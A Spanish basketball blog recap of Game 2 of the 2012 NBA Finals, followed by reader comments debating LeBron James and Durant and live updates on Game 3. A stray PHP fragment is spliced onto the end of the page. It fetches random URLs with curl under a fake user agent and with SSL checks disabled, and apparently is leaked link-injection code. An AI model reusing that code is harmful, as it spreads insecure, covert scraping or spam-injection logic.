La Crónica: Primer cuarto decisivo

15 de June de 2012 por Green Pride

Pues las Finales se ponen interesantes. Como ya dije el otro día, esperaba un Wade y un Bosh mucho más agresivos y unos Heat más determinados a ir a por el triunfo… Lo que no esperaba es que los Thunder saliesen con la caraja en lo alto, se dejaran endosar un 18-2 de parcial y Durant y Westbrook se metieran en problemas de faltas tan rápido. En unas Finales hay que salir a por todas y los de Oklahoma lo pagaron durante el resto del partido.

Los Heat salieron muy concienciados con defensas alternativas sobre Durant al que cogía o bien James o bien Battier y al que sus dos faltas tempranas sacaron del partido muy rápido haciéndolo desaparecer prácticamente hasta el descanso (6 puntos). Los Heat llegaron a tener hasta 17 puntos de ventaja a base de atacar la canasta con LeBron y Wade, del trabajo en el rebote de Bosh y de los triples de un infalible Battier. Por los Thunder, tras el horrible inicio, apareció James Harden para mantener a su equipo en el partido con 14 puntos en el primer cuarto unido al gran trabajo de Ibaka (el taponazo a LeBron en un intento de mate es para guardarlo bien).

A partir de ahí un intento contínuo de los Thunder por reducir la ventaja que siempre fue fantásticamente contestado por los Heat. A cada intento de Oklahoma respondía Miami no dejando que los Thunder se acercaran a menos de 8 puntos. Durant empezó a aparecer con 10 puntos en el tercer cuarto pero su equipo no pudo aproximarse y empezaba el último cuarto a 12 puntos.

A falta de 10 minutos para el final “Durantula” hizo la 5ª personal. Todo parecía indicar que Brooks le sentaría y ahí acabarían las opciones de remontar de OKC pero fue valiente y le dejó en cancha en un todo o nada esperando que su estrella supiera cuidarse de cometer la 6ª y pudiese ayudarles a remontar. Y los Thunder empezaron a apretar y Westbrook y Durant a jugárselas y a los Heat se les empezó a poner el partido cuesta arriba. Con OKC acercándose, un triple afortunadísimo a tablero de Battier primero y la única canasta de LeBron en todo el 4º cuarto después, mantuvieron la renta para Miami en 6. Un tiro libre ponía a OKC a 5 ya en el último minuto y todo parecía decidido. Pero Wade se dejó robar el balón y Durantula la clavó de 3 para poner a 2 a su equipo con 2 posesiones por jugar (y con esto hacía su punto 16 en el último cuarto). Los Heat volvieron a fallar en un ataque clutch (triple de LeBron sin sentido y sin ningún bloqueo) y la última posesión quedó para los Thunder para empatar o ganar el partido.

Estaba claro que la bola iba a ser para Durant y a los Heat les quedaba una falta que hacer sin bonus. Saque y Durant que sabe lo de la falta decide tirar rápido para evitar que les quiten tiempo con la falta sin bonus. En su tiro a media entrada recibe una falta clarísima de LeBron que los árbitros no pitan y el rebote va a James que sentencia en el tiro libre. A los Thunder les faltaron un par de minutos para culminar la remontada ante unos Heat que se descomponían como no lo habían hecho el resto del partido. De nuevo, una última jugada de un partido igualado que acababa con un tiro de tres de LeBron sin sentido y sin ningún sistema de por medio. Por suerte para ellos esta vez no les costó la derrota de milagro.

Ahora Miami se ha demostrado a sí mismos que puede hacer daño a los Thunder aunque sigue quedando la sensación de que los últimos cuartos pertenecen a OKC y a Durant y que si los Heat no mejoran en esos últimos minutos les será difícil ganar las Finales. Si el “Big Three” mantiene el nivel de hoy tendrán opciones aunque parece muy difícil que Miami pueda ganar los 3 seguidos en casa y que los Thunder vuelvan a salir tan dormidos nuevamente al principio de los partidos. Habrá que ver cómo va la serie en Florida y si se da algún cambio en el juego (¿puede Battier seguir metiendo 17 ptos por partido?). Sigo considerando a los Thunder favoritos al anillo pero no pueden permitirse pájaras como la de hoy al inicio si no quieren que los Heat consigan confianza y se les suban definitivamente a las barbas. Los próximos 2 partidos darán idea de cómo puede acabar esto y los ajustes de ambos. Espadas en todo lo alto….

PREMIOS

MVP: Casi lo estropea en el último cuarto pero esta vez hay que darle el MVP al “Elegido”. LeBron James se fue a 32 puntos, 8 rebotes y 5 asistencias anotando una canasta decisiva a poco más de un minuto y los tiros libres de la victoria. Wade y Bosh ayudaron lo suyo pero esta vez hay que dárselo a James.

Sorpresa: Shane Battier se fue de nuevo a los 17 puntos (parece mentira) suponiendo un dolor de cabeza contínuo para los Thunder con sus triples, uno de ellos a tablero decisivo en plena remontada de OKC. Nivelazo el que está aportando en estas Finales.

Decepción: Los secundarios de los Thunder esta vez jugaron en esta ocasión un partido más que discreto. Entre Sefolosha, Collison, Perkins y Fisher sólo aportaron 9 puntos dejando a su equipo en manos de un Big Three que les necesitaba por problemas de faltas.

Esfuerzo en vano: Casi MVP pero al final Kevin Durant se queda con el “esfuerzo en vano”. Tras una primera parte en la que jugó poco por sus problemas de faltas (6 puntitos al descanso) el bueno de Durántula se fue a 32 puntos, 3 rebotes, 2 robos  y un tapón con 16 puntos en el último cuarto que pusieron el miedo en el cuerpo para los Heat. Un a veces errático Westbrook también hizo un gran esfuerzo al final para morir en la orilla (27-8-7 pero 10/26 en tiros).

Imágenes | AP Photos / Getty Images

Comenta

44 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Gran trabajo, GreenPride, enhorabuena por tu publicación. La verdad es que viendo tu primer post en las demás entradas daban ganas de leerte una crónica.

    PD: aunque en ésta el primer post sea mío (si nadie me supera mientras escribo), espero tu tochopost igualmente, no te libras por haber hecho la crónica xD

      Citar

  2. simon dice:
    #2

    ajjaja me uno a Jose Luis! ya tenemos la cronica de Green cronista ahora queremos la del Green forero! jejejej

      Citar

  3. GreenPride dice:
    #3

    Muchas gracias Jose Luis, todo un honor el poder hacer una crónica de las Finales en este gran blog. Esta vez mi tochopost ya me lo he “largao” en la crónica así que no os voy a dar mucho más la lata.
    Lo dicho ahí, que sigo viendo a los Thunder favoritos pero tal y como pensaba no creo que les vaya a ser fácil llegar hasta esa victoria y creo que Miami va a tener sus opciones (lo veo 60-40 para los Thunder). A ver qué opináis vosotros.

      Citar

  4. Vader dice:
    #4

    Sí, yo sigo viendo favorito a OKC pero esta claro que ganar una final no es nunca un paseo y contra Miami y Lebron nunca podra serlo…

      Citar

  5. txusma dice:
    #5

    A riesgo de recibir palos voy a decir una cosa: Quiero que gane el campeonato Miami y lo quiero para que Lebron James tenga un anillo. Y es que lo considero, atención, uno de los jugadores más infravalorados de la liga.
    Esto viene a cuento por una discusión que mantenía con un amigo. Yo comparaba a Lebron James con Oscar Robertson y decía que sus números, una vez corregidos debido al paso del tiempo, no eran muy diferentes y que lo que está haciendo Lebron en la liga actualmente es histórico. Él me respondía, aparte de poner en duda eso de que los números son parecidos, que Robertson tenía un anillo y a partir de aquí la discusión derivaba hacia la sobrevaloración que creo yo tienen ciertos anillos. Por eso quiero que gane Lebron: para que se acabe la discusión y se acepte de una vez por todas que ya es un jugador histórico con unos registros a la altura de los grandes.

      Citar

  6. GreenPride dice:
    #6

    De acuerdo con Vader, contra LeBron nunca será un paseo y eso lleva al comentario de txusma, totalmente de acuerdo LeBron es un jugador histórico y eso quién lo dude es que no ve las salvajadas que hace y los números tan increíbles que hace pero…. nunca podrá compararse con los más grandes de la historia (Jordan, Bird, Magic, Kareem, etc) si no consigue que su equipo gane varios títulos y además decidiendo el partidos en los momentos decisivos. Para mí ese es el paso que le queda para pasar del jugador histórico que creo que ya es a auténtica leyenda codeándose con los 4 o 5 más grandes de todos los tiempos

      Citar

  7. TheDeerHunter dice:
    #7

    No me parece que un anillo haga codearse a LeBron con un top5 de todos los tiempos. Le hacen falta como mínimo 3 o 4… y aún así tengo muchas dudas.

      Citar

  8. futurman dice:
    #8

    Siempre me duele ver que junto a Magic, Jordan y compañía no mencionáis a Don Kobe Bryant…

    Por lo demás, una crónica estupenda. Así da gusto enterarte de los partidos. Lo único es si podríais poner de nuevo el box score que enlazabais en regular session.

      Citar

  9. simon dice:
    #9

    Coincido bastante en lo que ha dicho Txus. Lebron no me parece a la altura del grupo de los mejores de la historia pero si que me parece que con o sin anillo es parte de ese segundo grupito de mejores jugadores de siempre.

      Citar

  10. Txusma dice:
    #10

    TheDeerHunter:
    No me parece que un anillo haga codearse a LeBron con un top5 de todos los tiempos. Le hacen falta como mínimo 3 o 4… y aún así tengo muchas dudas.

    Ojo, ojo… A la altura de los más grandes no. Estoy de acuerdo en que debería ganar 4 o 5 (aunque que curioso que a Lebron le pidamos 4 o 5 y Bird tenga “sólo” 3).
    Pero vaya, que para mí ya debería estar en el TOP-50 y con un anillo se acercaría al TOP-10 peligrosamente.

      Citar

  11. TheDeerHunter dice:
    #11

    Lo de Bird, junto con lo de Magic trasciende una serie de cuestiones a las que objetivamente no podrá aspirar nunca LeBron por muy grande que éste sea.

      Citar

  12. Melo15 dice:
    #12

    Pues no lo entiendo, no veo razones.
    No sera por el equipo porque el que tenia Bird era muy superioi al de Lebron, con ganar 2 anillos a mi juicio ya seria TOP-3 en aleros y si pasa de 3 no veo razone spor las que no pudiera superar a Bird.

      Citar

  13. Nacho dice:
    #13

    Melo15:
    Pues no lo entiendo, no veo razones.
    No sera por el equipo porque el que tenia Bird era muy superioi al de Lebron, con ganar 2 anillos a mi juicio ya seria TOP-3 en aleros y si pasa de 3 no veo razone spor las que no pudiera superar a Bird.

    Por los años Melo, por los años.
    No los años de LeBron, ni siquiera los de Deer o los de Txusma, o los míos. Porque para que haya mitos hace falta que pase el tiempo. Igual que se dice que la comedia es tragedia + tiempo.
    Dentro de unos años, ponle 20. Cuando comentes en foros sobre la NBA, habrá algún jugador que todavía hoy se mea por las noches, que sea la leche. Algunos de los foreros fliparán con él, dirán que es uno de los mejores de la historia, y tú, y otros como tú diréis que nunca llegará a ser como LeBron, que aunque gane los 5 anillos que tiene él, nunca tendrá esa trascendencia. Igual entonces te acuerdas de estos momentos. Ahora, eso sí, espero que mis predicciones sobre el 6 de Miami no se cumplan, y no gane anillos.

    Sobre el partido, empecé una crónica por si Green no llegaba, pero entre que se me jodió el ordenador y que vi que ya la mandaba, pues eso, que suerte tuvisteis. Luego comento que ahora bastante brasa he dado.

      Citar

  14. Vader dice:
    #14

    futurman: Siempre me duele ver que junto a Magic, Jordan y compañía no mencionáis a Don Kobe Bryant…

    Por lo demás, una crónica estupenda. Así da gusto enterarte de los partidos. Lo único es si podríais poner de nuevo el box score que enlazabais en regular session.

    Pues en mi opinión Kobe no esta a la altura de los mejores… En sus primeros 3 anillos él era el escudero de Shaq y en los dos últimos el factor clave eran las dos torres que formaban Bynum y Gasol. Kobe ha sido muy bueno, un buen defensa y un anotador “asesino” pero para no ser no ha sido ni el mejor de su generación, así que…

    Seguro que hay gente que opina muy diferente, incluso yo he tenido mis momentos de duda despues de ver uno de sus partidos de 20 puntos en el último cuarto. Pero luego ves la trayectoria y aún siendo muy grande no es la de Magic, Bird, MJ… Incluso LeBron es superior para mi. ¿Alguien cree que Lebron no ganaria el anillo con el Shaq de los Lakers? ¿O con la pareja Gasol – Bynum de hace un par de años?

      Citar

  15. Melo15 dice:
    #15

    Bird era el mejor de su generacion?
    Te van a caer muchos palos por este ultimo comentario Vader XD

      Citar

  16. Vader dice:
    #16

    Se lo reparten él y Magic… Sí, ya se que menvan a flamear… XD

      Citar

  17. Ru dice:
    #17

    Auténtico partidazo que ha tenido de todo.Para empezar de nuevo Oklahoma a 20 por hora,para mí han hecho lo mismo que en el primer partido,así que no me pilla por sorpresa.De todas formas no lo veo como la clave del encuentro porque el tempo de los Thunder en los partidos es ese y parece que les ha ido bien.Hasta en este encuentro han tenido opciones de ganar,si creía que se obraba el milagro cuando vi a Durant enchufarla de 3 tras robo de Fisher…

    En fin,los minutos finales han sido antológicos,Durant aguantando con la 5ª y en modo “Leyenda” -si hubieran ganado con triple de Durant madre mía que orgía de adjetivos para él-,Miami aguantando malamente,LeBron citándose con los fantasmas del clutch,anotando dos tiros libres con las pulsaciones a mil,tremenda carajas de Wade (robo de Fisher,la experiencia es un grado,más en un equipo así) y de LeBron (¡!!!!) en el saque de banda que conllevó a la posterior falta no pitada (clarísima por dios) y para mi juicio muy importantes,Miami arriba 98-96 y eran dos libres para Durant.Queda feo decir que Miami ganó por los árbitros porque el resto del partido hubo un arbitraje correcto pero es que…

    Me queda el poso de que Miami ha jugado al 100 % con un gran juego en equipo -si,en equipo- siendo muy solidarios,con una mejor aportación de Wade y Bosh y sobre todo con la inestimable ayuda de Battier,y con todo eso OKC ha estado ahí.Así que siguen siendo favoritos los Thunder.

    Sobre el debate abierto por txusma,se le infravalora porque hace gestitos y por toda la parafernalia a su alrededor,porque le quisieron para asaltar el trono de Jordan,porque es un jugador de imagen,porque,porque…es cierto que no tiene el ángel de jugador místico pero es que es cojonudamente bueno y sus números son los que son,por mucho “hater” que haya.Y un anillo le haría justicia porque que un jugador así que tenga que soportar esa presión por el resto del mundo…no es justo.Por cierto,que quitando el pique con KG se ha visto al LeBron más maduro en ese sentido de gesticulitis (y en muchos otros) que yo recuerde.

      Citar

  18. Esteban dice:
    #18

    txusma:
    A riesgo de recibir palos voy a decir una cosa: Quiero que gane el campeonato Miami y lo quiero para que Lebron James tenga un anillo. Y es que lo considero, atención, uno de los jugadores más infravalorados de la liga.
    Esto viene a cuento por una discusión que mantenía con un amigo. Yo comparaba a Lebron James con Oscar Robertson y decía que sus números, una vez corregidos debido al paso del tiempo, no eran muy diferentes y que lo que está haciendo Lebron en la liga actualmente es histórico. Él me respondía, aparte de poner en duda eso de que los números son parecidos, que Robertson tenía un anillo y a partir de aquí la discusión derivaba hacia la sobrevaloración que creo yo tienen ciertos anillos. Por eso quiero que gane Lebron: para que se acabe la discusión y se acepte de una vez por todas que ya es un jugador histórico con unos registros a la altura de los grandes.

    perdon? eh leido bien? james infravalorado? ahora si lo he leido todo

    desde que james cumplio 16 años la NBA ha armado a su alrededor todo un circo mediatico que james a veces si a veces no, pudo justificar

    se llevo un rookie del año inentendible, cuando melo llevo a los nuggets a los PO con 20 pts de promedio, cuantos rookies pueden alardear de eso? igualmente el ROY fue para james como la pirotcnia mediatica indicaba

    le llaman el REY, aunque no tiene corona, le llaman el ELEGIDO, para que?

    3 MVP de regular season, cuando durant no tiene ninguno, hace 3 años metio a unos ignotos thunder a los PO de la nba y nada, el año pasado se metio 4to y final de conferencia y nada, este año domino la liga, tercer goleador consecutivo, lidera a un grupo con 23 años, juega final de liga y nada

    y el MVP se lo dan a james??? que jugaba en los cavs con shaq, jamison, mo etc, y este año con bosh y wade!

    no digo que james sea malo, muy por el contrario, es una superestrella como pocas eh visto, pero de ahi a que este infravalorado, madre que diferencia

      Citar

  19. melo15 dice:
    #19

    Aunque el ROY es verdad que se lo merecia Carmelo Anthony, Lebron tambien hizo una pedazo de temporada y tanto en esa como en las siguientes esta promediando 27-6-6 cuantos pueden decir eso, aparte de ser un gran defensor.
    Yo tambien quiero que gane Lebron, porque se lo merece, porque lleva luchando toda su vida por el anillo y porque los Thunder aun son jovenes y tendran mas oportunidades.

      Citar

  20. Tobal dice:
    #20

    Los Thunder no jugaron un buen partido,un equipo que quiere aspirar a ganar el anillo,no puede salir dormido como salió al principio,eso ante un buen equipo como Miami,se paga muy caro.Kevin Durant estuvo muy solo en ataque,tiró de nuevo de su equipo,pese al lastre de las faltas personales,Westbrook estuvo otra vez,muy chupón con el balón,no es capaz de levantar la cabeza y ver a sus compañeros desmarcados,se juega demasiados lanzamientos,otro punto débil de Oklahoma City Thunder,fue su juego interior,que aportó poco en el tema ofensivo,creo que les hace falta un pívot anotador,que sepa jugar en el poste bajo,de esa manera serían muy fuertes.

      Citar

  21. Txusma dice:
    #21

    Esteban: perdon? eh leido bien? james infravalorado? ahora si lo he leido todo

    desde que james cumplio 16 años la NBA ha armado a su alrededor todo un circo mediatico que james a veces si a veces no, pudo justificar

    se llevo un rookie del año inentendible, cuando melo llevo a los nuggets a los PO con 20 pts de promedio, cuantos rookies pueden alardear de eso? igualmente el ROY fue para james como la pirotcnia mediatica indicaba

    le llaman el REY, aunque no tiene corona, le llaman el ELEGIDO, para que?

    3 MVP de regular season, cuando durant no tiene ninguno, hace 3 años metio a unos ignotos thunder a los PO de la nba y nada, el año pasado se metio 4to y final de conferencia y nada, este año domino la liga, tercer goleador consecutivo, lidera a un grupo con 23 años, juega final de liga y nada

    y el MVP se lo dan a james??? que jugaba en los cavs con shaq, jamison, mo etc, y este año con bosh y wade!

    no digo que james sea malo, muy por el contrario, es una superestrella como pocas eh visto, pero de ahi a que este infravalorado, madre que diferencia

    Ves? Infravalorado por este mismo. Parece que los premios de Lebron sean todos discutibles. Mírate sus números el año q ganó los MVP. Son alucinantes, números de otra época. Pones alguno en duda? Y ya se podía haber llevado también el del 2006.
    Pones en duda el ROY de Lebron y repasas los números y son mejores los de James que los de Carmelo. Los mismos puntos por partido, prácticamente los mismos rebotes y más asistencias, robos y tapones por partido. Robo a mano armada? Yo recuerdo aquel premio y creo que lo más justo hubiera sido compartirlo pq los 2 nos hicieron vibrar de lo lindo, pero de ahí ha llamarlo robo…

    Y ahora voy a por Durant. Pues claro que no tiene ningun MVP. Este ha sido el primer año que realmente se ha puesto en disposición de ganar el MVP y si se lo hubieran dado tampoco me habría parecido mal. Te rñies de que Lebron jugaba con Shaq (en clarísima decadencia) y Jamison en los Cavs y Bosh y Wadeen los Heat y obvias que Durant juega al lado de Westbrook y Harden que mancos del todo no son.

    Y para acabar: Hughes, Ilgauskas, Gooden, Pavlovic, Marshall… Estos eran los otros 5 mejores jugadores de los Cavs del 2007 que llegaron a la final. Podemos decir que ese año, Lebron James llevó solo, solísimo a los Cavs a toda una final de la NBA.

      Citar

  22. melo15 dice:
    #22

    Los numeros de Melo eran casi calcados a los de Lebron y encima clasifico a los Nuggs a playoffs en el salvaje oeste, en cambio James no lo hizo en una conferencia mucho mas debil.
    PD: Una pregunta para los veteranos. ¿Vosotros erais de los que pensabais que en el 2003, 2004 era mas jugador Melo que Lebron?

      Citar

  23. Esteban dice:
    #23

    txuma, en primer lugar, considero que hacer grandes numeros en un pesimo equipo es muchisimo menos valioso que hacer buenos numeros en un equipo ganador, EVANS tamb tuvo buenos numeros en su año rookie, mucho mejores que los de harden por ej, pero la diferencia era el equipo donde jugaba

    muchos dicen lo mismo sobre irving y ricky, ya que el catalan sin numeros tan grandes como los de irving, mantenia a su equipo en PO, creo que eso puede ser mas valioso

    el año donde james llevo a los cavs a las finales, solo tuvo oposicion seria frente a detroit, en esa epoca el resto de la conferencia este daba pena

    considero mas valioso lo hecho por durant en estos 3 años, siendo el lider de un equipo taaaaan joven que lo de lebron jugando al lado de un MVP de finales como wade

    que westbrok sea buenisimo y harden tambien, no empañan que durant sea el que lleve a ese equipo a donde esta, nadie lleva solo un equipo a la final de la nba, hasta jordan jugaba con pippen, pero el lider es quien vale por el resto,

    lebron es buenisimo, lo reconozco, pero ha sido inflado y mas inflado por la prensa, el hecho que kobe tenga un solo MVP de finales, con los mismos numeros que lebron y este tenga 3, creo que marcan algo

      Citar

  24. Pop dice:
    #24

    Melo15: Pues no lo entiendo, no veo razones.No sera por el equipo porque el que tenia Bird era muy superioi al de Lebron, con ganar 2 anillos a mi juicio ya seria TOP-3 en aleros y si pasa de 3 no veo razone spor las que no pudiera superar a Bird.

    Larry Bird no tiene nada que envidiarle a Lebron en números. Si LJ está haciendo temporadas de 29/7/7 Larry los hacía de 26/10/7. No sé qué números son más espectaculares. Eso es en lo que están más parejos, a mi entender: en los números. A menos que cambie bastante la cosa, Bird era mil veces más peligroso y ganador de lo que es James, por lo menos actualmente. Es decir, puedes estar bien preocupado cuando te enfrentes a James. Pero te cagabas encima y te dabas por jodido si lo hacías contra Bird, sobre todo en partidos clave y ajustados.

    Si Bird tiene “solo” 3 anillos es porque coincidió por obra del destino con nada menos que Magic y los Lakers del showtime, y viceversa. Y es que hay anillos que deberían valer doble.

    De todas maneras, todo puede darse. No podría descartar que los próximos años, empezando por esta final, James llegue a la altura de estos mitos. Para mí está ahora mismo un peldaño por debajo. Ojalá surja una larga rivalidad Thunders-Heat, y por ende James-Durant que nos hagan revivir épocas doradas.

      Citar

  25. Esteban dice:
    #25

    creo que estas finales, han demostrado que durant es mejor que james, incluso que este james en estado de gracia, ya que lo hecho por durat en los ultimos cuartos de los dos partidos, es algo de otro mundo

      Citar

  26. simon dice:
    #26

    Lo que dice Pop es verdad los anillos de la época de Bird y Magic deberían valer doble.
    Por cierto creo que un hecho muy importante para tener a Bird y Magic en un top 5 históricos de la liga influye mucho positivamente su enfrentamiento entre ellos que los engrandó aun mas si cabe. Parecido podría pasar si en los proximos años se suceden las finales Thunder-Miami o lo que es lo mismo James- Durant podría mitificarlos y dispararlos hacia el olimpo del baloncesto.
    PD: Un dato de lo Gigante que esta siendo Lebron en estos Play Off es que muchos menosprecian sus actuaciones y premios en los Heat por el hecho de jugar a lado de Wade todo un MVP de finales, pero para mi es justo lo contrario, engrandece sus actuaciones pq un dato mas de lo gigantes que estan siendo los PO de Lebron es que todo un MVP de finales como Wade es su simple escudero.

      Citar

  27. simon dice:
    #27

    Añado que para mi es mejor Durant que Lebron por si queda alguna duda.

      Citar

  28. Esteban dice:
    #28

    simon:
    Lo que dice Pop es verdad los anillos de la época de Bird y Magic deberían valer doble.
    Por cierto creo que un hecho muy importante para tener a Bird y Magic en un top 5 históricos de la liga influye mucho positivamente su enfrentamiento entre ellos que los engrandó aun mas si cabe. Parecido podría pasar si en los proximos años se suceden las finales Thunder-Miami o lo que es lo mismo James- Durant podría mitificarlos y dispararlos hacia el olimpo del baloncesto.
    PD: Un dato de lo Gigante que esta siendo Lebron en estos Play Off es que muchos menosprecian sus actuaciones y premios en los Heat por el hecho de jugar a lado de Wade todo un MVP de finales, pero para mi esjusto lo contrario, engrandece sus actuaciones pq un dato mas de lo gigantes que estan siendo los POde Lebron es que todo un MVP de finales como Wade es su simple escudero.

    es preferible tener de escudero a wade q a westbrook, te da mas seguridad, ademas de mas experiencia y valor en el vestuario

      Citar

  29. melo15 dice:
    #29

    A mi juicio es mejor Lebron en los aspectos medibles del baloncesto.
    En ataque es mucho mas completo KD como ya se vio ayer donde Lebron solo anotaba en penetracion en cambio Durant de 3, media distancia, en transicion…
    Pero en lo demas es superior Lebron, mucho mejor defensor, pase , manejo de balon a pesar de que Durant ha mejorado mucho, estan igualados en rebote pero Bron es mejor defensor.
    A partir de ahi Durant fulmina en los ultimo cuartos anotando de todas las maneras, en cambio Bron parecia que no sabia que hacer con la pelota.

      Citar

  30. arivas dice:
    #30

    ¿ sabeis si ponen en abierto (por cuatro, enegy o lo que sea) el partido de esta noche, o tienen previsto dar algun partido de la final?

      Citar

  31. MagicJohnson32 dice:
    #31

    Diría que no, Ari. Va todo por D+.

      Citar

  32. Txusma dice:
    #32

    Si se llega al séptimo lo podrían dar en abierto y en directo como aquel Celtics-Lakers de hace un par de años.

      Citar

  33. Sancho88 dice:
    #33

    buena noticia para melo, vuelve ROY!!

      Citar

  34. melo15 dice:
    #34

    Creeis que puede recuperar su nivel, tampoco era un jugador que se sirviera mucho de su fisico para anotar.
    Se sabe en que equipo jugara.

      Citar

  35. MagicJohnson32 dice:
    #35

    Si vuelve, que está por ver, dudo que pase del rol que tuvo el año pasado: 20-25 minutos saliendo desde el banquillo.

    Está amnistiado así que es agente libre y puede jugar en cualquier sitio excepto los Blazers.

      Citar

  36. melo15 dice:
    #36

    Alguien se queda a ver el partido de esta noche, para comentarlo por aqui.

      Citar

  37. simon dice:
    #37

    melo15:
    Alguien se queda a ver el partido de esta noche, para comentarlo por aqui.

    yo intentaré estar melo pero vengo de un fin de semana de viaje que ha sido duro y no se si aguantaré.

      Citar

  38. melo15 dice:
    #38

    No me vengais con estas excusas Cafes, Coca-Colas, tomaros lo que querais pero ver el partido que no se ven Finales todos los dias.
    PD: Dormir es de covardes!

      Citar

  39. melo15 dice:
    #39

    Inicio espectacular (otra vez) de los Heat, haciendo mucho daño Wade & Bosh en el Pick & Roll, por parte de los Thunder Westbrook lleva 2 malas decisiones en 3 jugadas y 0 puntos.
    Scott Brooks ha pedido tiempo muerto antes de que se vayan mucho los Heat. De momento 10-4.

      Citar

  40. Jones dice:
    #40

    Parece que los Thunder estabilizan un poco las diferencias con un Westbrook más espabilado a la salida del primer tiempo muerto.
    Dos canastas suyas y una de Durant colocan el marcador en un 14-16 a falta de 3:12 para finalizar el primer cuarto.

      Citar

  41. Jones dice:
    #41

    Dos apuntes al final del primer cuarto:
    1. ¿Se puede estar más cascado que Mike Miller? Madre de dios, si ha hecho un palmeo y ya tenía las manos sobre las rodillas, qué barbaridad.
    2. ¿No os da la extraña, sospechosa, como queráis llamarlo, de que Lebron hace pasos en todas las jugadas?

    Dejando a un lado esto, 20-25 para Miami en el primer cuarto con 10 puntos 5 rebotes de “El Elegido” y con 18 puntos anotados por el Big Three de Miami, casi nada. Por otro lado, por los Thunder está jugando buenos minutos desde el inicio KD y parece que el equipo entero ha salido mucho más centrado. La pregunta es: ¿le bastará a Miami con lo que tiene ahora para aguantar durante todo el partido? Lo digo porque las segundas partes de los Thunder son monstruosas.

      Citar

  42. melo15 dice:
    #42

    Final del primer cuarto en Miami, 26-20 y los Thunder aguantanto en el primer cuarto.
    Los Heat haciendo muchisimo daño en la pintura con 20 puntos, espectacular cuarto de King James, y aportando Bosh y Wade.
    Los Thunder has empezado mejor, mas concentrados, viviendo de zarpazos intermitentes de sus estrellas, pero bastante blandos en defensa.

      Citar

  43. German dice:
    #43

    Jones:
    Dos apuntes al final del primer cuarto:
    1. ¿Se puede estar más cascado que Mike Miller? Madre de dios, si ha hecho un palmeo y ya tenía las manos sobre las rodillas, qué barbaridad.
    2. ¿No os da la extraña, sospechosa, como queráis llamarlo, de que Lebron hace pasos en todas las jugadas?

    Dejando a un lado esto, 20-25 para Miami en el primer cuarto con 10 puntos 5 rebotes de “El Elegido” y con 18 puntos anotados por el Big Three de Miami, casi nada. Por otro lado, por los Thunder está jugando buenos minutos desde el inicio KD y parece que el equipo entero ha salido mucho más centrado. La pregunta es: ¿le bastará a Miami con lo que tiene ahora para aguantar durante todo el partido? Lo digo porque las segundas partes de los Thunder son monstruosas.

    Si bien en la NBA se ven pasos siempre, para mi es escandaloso la cantidad de veces que lo hace James y jamas le cobran una.

      Citar

  44. GreenPride dice:
    #44

    Se atasca el trueno…. En el peor partido de estas finales de largo y con las defensas ajustando mucho sobre ambos ataques los Heat se ponen por delante ante la incapacidad de los Thunder para anotar en el último cuarto. De nuevo decisivas las faltas de Durant que se fue al banco en pleno despegue de OKC en el tercer cuarto cuando parecía que podían romper el partido. Probablemente Brooks debería de plantearse dejar a Durant sobre Chalmers al menos hasta el tercer cuarto para protegerle de las faltas. Ahora OKC tiene otra prueba de fuego para su juventud y dureza mental. Si no se hacen con el 4º partido lo tendrán casi imposible. Luego suelto mi visión completa del partido en su post.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>